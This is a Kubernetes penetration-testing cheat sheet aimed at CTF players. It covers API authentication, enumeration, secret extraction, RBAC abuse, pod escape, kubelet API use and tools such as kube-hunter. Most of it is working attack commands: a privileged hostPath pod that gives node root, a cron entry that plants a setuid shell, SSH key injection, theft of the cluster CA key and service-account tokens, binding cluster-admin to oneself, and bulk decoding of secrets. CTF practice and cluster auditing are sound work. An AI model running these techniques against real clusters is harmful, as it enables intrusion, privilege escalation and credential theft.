k8s::ctf

pentest kubernetes · container · RBAC
Architecture
Control Plane
Component            Role
kube-apiserver       Central REST API — all kubectl commands hit this
etcd                 Key-value store — holds ALL cluster state, including secrets
kube-scheduler       Assigns pods to nodes
controller-manager   Runs control loops (deployments, replicasets…)
Data Plane (each Node)
Component           Role
kubelet             Node agent — runs pods, exposes /metrics, /exec API
kube-proxy          Network rules (iptables/ipvs)
container runtime   containerd / docker
/var/lib/kubelet    Pod specs, credentials, volume mounts on disk
Key API Groups
Path                              Contains
/api/v1                           Pods, Services, Secrets, ConfigMaps, Namespaces
/apis/apps/v1                     Deployments, StatefulSets, DaemonSets
/apis/rbac.authorization.k8s.io   Roles, RoleBindings, ClusterRoles
/apis/batch/v1                    Jobs, CronJobs
/version, /healthz                Unauthenticated fingerprinting endpoints
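These group paths map one-to-one onto raw HTTP routes, which matters when all you have is curl. A minimal sketch of the URL pattern — the helper function names here are ours, purely illustrative:

```shell
# Hypothetical helpers showing how resource URLs are built:
# core group:   /api/v1/namespaces/<ns>/<resource>
# named groups: /apis/<group>/<version>/namespaces/<ns>/<resource>
core_path()  { echo "/api/v1/namespaces/$1/$2"; }
group_path() { echo "/apis/$1/namespaces/$2/$3"; }

core_path default secrets                # the route `kubectl get secrets -n default` hits
group_path apps/v1 default deployments
```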
Setup & Authentication
Fix & Use a Kubeconfig
# The server field is often wrong in CTF configs (127.0.0.1)
kubectl config set-cluster default \
  --server=https://<host>:<port> \
  --kubeconfig=./kube.yaml

export KUBECONFIG=./kube.yaml

# Or inline per-command
kubectl --kubeconfig=./kube.yaml get pods
Auth Methods
Method               How to identify
Client cert (mTLS)   client-certificate-data + client-key-data in kubeconfig
Bearer token         token: field in kubeconfig, or Authorization: Bearer header
Service account      /var/run/secrets/kubernetes.io/serviceaccount/token inside pod
Anonymous            No auth — check if the API is open
curl directly (no kubectl)
# Extract certs from base64 kubeconfig fields
echo "<ca_data>" | base64 -d > ca.crt
echo "<cert_data>" | base64 -d > client.crt
echo "<key_data>" | base64 -d > client.key

# Hit the API directly
curl --cacert ca.crt --cert client.crt --key client.key \
  https://<host>:6443/api/v1/namespaces

# With bearer token
curl -k -H "Authorization: Bearer $TOKEN" \
  https://<host>:6443/api/v1/secrets
Auth from inside a Pod
# SA token and cert auto-mounted here
SADIR=/var/run/secrets/kubernetes.io/serviceaccount
TOKEN=$(cat $SADIR/token)
CACERT=$SADIR/ca.crt
HOST=https://kubernetes.default.svc

curl --cacert $CACERT -H "Authorization: Bearer $TOKEN" \
  $HOST/api/v1/namespaces
Enumeration
First things to run
# Cluster version / fingerprint
kubectl version
kubectl cluster-info

# What can THIS identity do? (critical first step)
kubectl auth can-i --list
kubectl auth can-i --list -n kube-system

# All namespaces
kubectl get namespaces

# Everything everywhere
kubectl get all --all-namespaces
kubectl get pods,svc,secrets,cm --all-namespaces
Pods & Containers
# List pods with node info
kubectl get pods -o wide --all-namespaces

# Full pod spec (look for: hostPID, hostNetwork,
# privileged, hostPath mounts, env vars, SA)
kubectl describe pod <name>
kubectl get pod <name> -o yaml

# Execute into pod
kubectl exec -it <pod> -- /bin/sh

# Read logs
kubectl logs <pod> --previous
ConfigMaps & Env Vars
# ConfigMaps often hold flags or configs
kubectl get configmaps --all-namespaces
kubectl describe configmap <name>
kubectl get configmap <name> -o yaml

# Env vars injected into a running pod
kubectl exec <pod> -- env

# Full JSON dump of all configmaps
kubectl get cm --all-namespaces -o json | \
  jq '.items[].data'
Secrets
Reading Secrets
# List all secrets
kubectl get secrets --all-namespaces

# Decode a specific secret
kubectl get secret <name> -o jsonpath='{.data}' | \
  python3 -c "import sys,json,base64; \
  [print(k,'=',base64.b64decode(v).decode()) \
  for k,v in json.load(sys.stdin).items()]"

# Dump & decode ALL secrets at once
kubectl get secrets -A -o json | jq -r '.items[]
  | .metadata.namespace + "/" + .metadata.name + ": "
    + (.data // {} | to_entries[] | .key + "=" + (.value | @base64d))'
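Secret .data values are plain standard base64 — encoded, not encrypted. A quick offline round-trip with a made-up value shows the decode step in isolation:

```shell
# Sample value only — any flag-looking string works here
enc=$(printf 'CTF{example_flag}' | base64)
echo "$enc"                      # the blob as it would appear under .data
printf '%s' "$enc" | base64 -d   # back to the plaintext flag
```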
Secret Types to Look For
Type                                  What it holds
Opaque                                Arbitrary data — flags live here
kubernetes.io/tls                     tls.crt, tls.key
kubernetes.io/service-account-token   SA JWT token — can impersonate that SA
kubernetes.io/dockerconfigjson        Registry creds — may have useful tokens
bootstrap.kubernetes.io/token         Bootstrap token — cluster join creds
etcd Direct Read (if you have node access)
# Secrets stored unencrypted in etcd by default
ETCDCTL_API=3 etcdctl --endpoints=https://127.0.0.1:2379 \
  --cacert=/etc/kubernetes/pki/etcd/ca.crt \
  --cert=/etc/kubernetes/pki/etcd/server.crt \
  --key=/etc/kubernetes/pki/etcd/server.key \
  get /registry/secrets/default/ --prefix

# Or find etcd certs on a compromised node
find / -name "etcd" -type f 2>/dev/null
ls /etc/kubernetes/pki/etcd/
RBAC Abuse
Map Permissions
# What can the current user do?
kubectl auth can-i --list

# Specific permission check
kubectl auth can-i get secrets -n kube-system
kubectl auth can-i create pods
kubectl auth can-i impersonate serviceaccounts

# Enumerate all roles and who has them
kubectl get clusterrolebindings -o wide
kubectl get rolebindings -A -o wide

# Inspect a specific role
kubectl describe clusterrole <name>
Dangerous Permissions
Permission                   Exploit                               Severity
create pods                  Spawn privileged pod, mount host FS   critical
get/list secrets             Read all secrets directly             critical
exec into pods               Code exec in existing pods            high
create/patch deployments     Inject malicious container            high
impersonate SA               Become high-priv service account      critical
update clusterrolebindings   Grant yourself any permission         critical
get nodes/proxy              Call kubelet API directly             high
wildcard (*)                 Full cluster admin                    critical
Privilege Escalation via Role Manipulation
# If you can create/update ClusterRoleBindings
# (bind your actual username or SA — not the context name):
kubectl create clusterrolebinding pwned \
  --clusterrole=cluster-admin \
  --user=<your-username>
# ...or for a service account: --serviceaccount=<ns>:<sa-name>

# If you can impersonate users/groups:
kubectl --as=admin --as-group=system:masters get secrets -A
kubectl --as=system:serviceaccount:kube-system:default \
  auth can-i --list
RBAC with kubectl-who-can / rakkess
# rakkess (installed as "access-matrix"): matrix of all resources vs verbs
kubectl access-matrix

# kubectl-who-can: who can do X?
kubectl who-can get secrets
kubectl who-can create pods -n kube-system

# rbac-tool: audit all bindings
kubectl rbac-tool lookup <service-account-name>
kubectl rbac-tool policy-rules -e ".*admin.*"
Pod Escape & Container Breakout
Privileged Pod → Node Root
# If you can CREATE pods, spawn a privileged one
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: escape
spec:
  hostPID: true
  hostNetwork: true
  containers:
  - name: escape
    image: ubuntu
    securityContext:
      privileged: true
    command: ["/bin/sh", "-c", "sleep 9999"]
    volumeMounts:
    - mountPath: /host
      name: host-root
  volumes:
  - name: host-root
    hostPath:
      path: /
EOF

# Then exec in and chroot to node
kubectl exec -it escape -- chroot /host /bin/bash
# You now have full node root access
Check Container for Escape Conditions
# Am I in a container?
cat /proc/1/cgroup | grep -i "docker\|kubepods"
ls /.dockerenv

# Privileged container?
cat /proc/self/status | grep CapEff
# CapEff: 0000003fffffffff = full caps = privileged

# Host PID namespace?
ls /proc | wc -l  # many procs = host PID

# Writable host path mounted?
mount | grep -E "/host|/node|/mnt"
cat /proc/mounts
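CapEff is a hex bitmask, so a single capability can be checked with shell arithmetic when capsh isn't in the container. A sketch — the function name is ours; CAP_SYS_ADMIN is bit 21, present in the full (privileged) set and absent from the typical default container set:

```shell
# Check one capability bit in a CapEff hex value
# usage: has_cap <bit> <hex-capeff>
has_cap() { (( (0x$2 >> $1) & 1 )) && echo yes || echo no; }

has_cap 21 0000003fffffffff   # full cap set     -> yes
has_cap 21 00000000a80425fb   # default cap set  -> no
```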
Escape via hostPath + cron
# If /host is mounted, write a cron job or SSH key
# (cron runs on the host, so the suid shell lands in the host's /tmp —
#  reachable from the container as /host/tmp/b)
echo "* * * * * root cp /bin/bash /tmp/b; chmod +s /tmp/b" \
  >> /host/etc/cron.d/escape

# Or write authorized_keys
mkdir -p /host/root/.ssh
echo "<your_pubkey>" >> /host/root/.ssh/authorized_keys

# Or just read the node's flag/secrets directly
cat /host/etc/kubernetes/pki/ca.key  # cluster CA key!
cat /host/var/lib/kubelet/config.yaml
Kubelet API (port 10250)
# Kubelet exposes an API on each node (often open)
# List pods running on that node
curl -sk https://<node-ip>:10250/pods

# Execute command in a container
curl -sk \
  https://<node-ip>:10250/run/<ns>/<pod>/<container> \
  -d "cmd=cat /etc/passwd"

# Read logs
curl -sk \
  https://<node-ip>:10250/containerLogs/<ns>/<pod>/<ctr>
Service Accounts
Enumerate & Steal SA Tokens
# List all service accounts
kubectl get serviceaccounts --all-namespaces

# SA token mounted inside any pod you can exec into
cat /var/run/secrets/kubernetes.io/serviceaccount/token

# Decode the JWT to see who you are
cat /var/run/secrets/kubernetes.io/serviceaccount/token | \
  cut -d. -f2 | base64 -d 2>/dev/null | python3 -m json.tool

# Get a token for a specific SA (if you have perms)
kubectl create token <sa-name> -n <namespace>
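The `cut | base64 -d` trick above can choke when the JWT payload contains base64url characters or lacks padding. A slightly more robust variant (the function name is ours), demonstrated on a synthetic token:

```shell
# Decode a JWT payload: translate base64url -> base64, restore padding
jwt_payload() {
  local p
  p=$(printf '%s' "$1" | cut -d. -f2 | tr '_-' '/+')
  case $(( ${#p} % 4 )) in 2) p="$p==" ;; 3) p="$p=" ;; esac
  printf '%s' "$p" | base64 -d
}

# Synthetic header.payload.signature token, just for the demo
PAYLOAD=$(printf '{"sub":"demo-sa"}' | base64 | tr -d '=\n' | tr '/+' '_-')
jwt_payload "x.$PAYLOAD.y"
```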
Use a Stolen SA Token
# Set it in kubeconfig
kubectl config set-credentials attacker \
  --token=<jwt>
kubectl config set-context attacker \
  --cluster=default --user=attacker
kubectl config use-context attacker

# Or just export it
export TOKEN=<jwt>
kubectl --token=$TOKEN get secrets -A

# Impersonate via API flag
kubectl --as=system:serviceaccount:kube-system:default \
  auth can-i --list
Network Recon
Service Discovery
# All services and their ClusterIPs/ports
kubectl get svc --all-namespaces -o wide

# Endpoints (which pods back a service)
kubectl get endpoints --all-namespaces

# DNS from inside a pod: <svc>.<ns>.svc.cluster.local
curl http://<svc-name>.<namespace>.svc.cluster.local

# Port-forward a service to localhost
kubectl port-forward svc/<name> 8080:80 -n <ns>
Common Internal Ports
Port        Service                Notes
6443        kube-apiserver         Main API, TLS
2379-2380   etcd                   Raw secret storage
10250       kubelet                Node exec API
10255       kubelet (read-only)    Unauthenticated read
8080        apiserver (insecure)   Old clusters only
179         BGP (Calico)           Network plugin
Tools
kubectl plugins (krew)
kubectl krew install who-can
kubectl krew install access-matrix  # rakkess
kubectl krew install rbac-tool
kubectl krew install sniff      # packet capture
kubectl krew install node-shell  # node shell
kubectl krew install neat        # clean yaml output
Dedicated Audit Tools
Tool          Use
kubeaudit     Security audit of manifests & live cluster
kube-bench    CIS benchmark checks
kube-hunter   Active vuln scanner (good for CTF)
trivy         Image + config scanning
peirates      K8s pentest framework
kube-hunter (quick scan)
# Install
pip install kube-hunter

# Scan remote cluster
kube-hunter --remote <host>

# Scan from inside a pod
kube-hunter --pod

# Active mode (actually exploits)
kube-hunter --remote <host> --active
Common CTF Patterns
Decision Tree: Where is the flag?
Got kubeconfig
  → fix server addr → auth can-i --list
  → get secrets -A → decode .data values

No secret perms
  → exec into pods → read env / SA token
  → escalate with token → get secrets -A

Can create pods
  → privileged pod → mount host /
  → chroot /host → node root
Pattern: Flag in Secret (most common)
# 1. List secrets
kubectl get secrets -A

# 2. Get the suspicious one
kubectl get secret flag -o yaml

# 3. Decode
kubectl get secret flag \
  -o jsonpath='{.data.flag}' | base64 -d
Pattern: Flag in ConfigMap or Env
# ConfigMaps are NOT base64 encoded
kubectl get cm -A -o json | \
  jq '.items[].data'

# Env vars in a running pod
kubectl exec <pod> -- env | grep -i "flag\|CTF\|secret"

# In pod spec (not runtime)
kubectl get pod <pod> -o json | \
  jq '.spec.containers[].env'
Pattern: RBAC Escalation to Secrets
# You can create pods but not read secrets:
# spawn a pod that pulls the secret in via env, then read its output
kubectl run reader --image=alpine --restart=Never \
  --overrides='{"spec":{"containers":[{"name":"reader",
    "image":"alpine","command":["env"],
    "env":[{"name":"FLAG","valueFrom":{"secretKeyRef":
    {"name":"flag","key":"flag"}}}]}]}}'
kubectl logs reader

# Or mount the secret as a volume in a privileged pod spec
Pattern: Anonymous API Access
# Some clusters allow unauthenticated reads
curl -k https://<host>:6443/api/v1/namespaces
curl -k https://<host>:6443/api/v1/secrets

# Old clusters: insecure port 8080 (no TLS/auth)
curl http://<host>:8080/api/v1/secrets

# Kubelet read-only port 10255
curl http://<node>:10255/pods
curl http://<node>:10255/metrics
One-liner: Dump everything
# Shotgun: dump all useful resources to files
for r in pods secrets configmaps \
         serviceaccounts rolebindings \
         clusterrolebindings deployments; do
  kubectl get $r -A -o yaml > /tmp/$r.yaml
done

# Grep for flag pattern across all
grep -rE "picoCTF|HTB\{|CTF\{" /tmp/*.yaml

# Decode all base64 blobs in secret dumps
grep -oP '(?<=: )[A-Za-z0-9+/=]{20,}' /tmp/secrets.yaml | \
  xargs -I{} bash -c 'base64 -d <<< "{}" 2>/dev/null'
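The blob-decode step can be sanity-checked offline against a synthetic dump (sample data, not a real secret):

```shell
# Build a fake secrets dump, then run the same grep/decode pass over it
cat > /tmp/demo-secrets.yaml <<'EOF'
data:
  flag: Q1RGe2RlbW9fZmxhZ30=
EOF

grep -oP '(?<=: )[A-Za-z0-9+/=]{20,}' /tmp/demo-secrets.yaml | \
  while read -r blob; do printf '%s' "$blob" | base64 -d; echo; done
# prints CTF{demo_flag}
```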
CTF quick checklist:  ① Fix server addr in kubeconfig  → ② auth can-i --list  → ③ get secrets -A + decode  → ④ get configmaps -A  → ⑤ exec into pods + read env/SA token  → ⑥ check RBAC bindings for priv escalation path  → ⑦ if can create pods → privileged + hostPath mount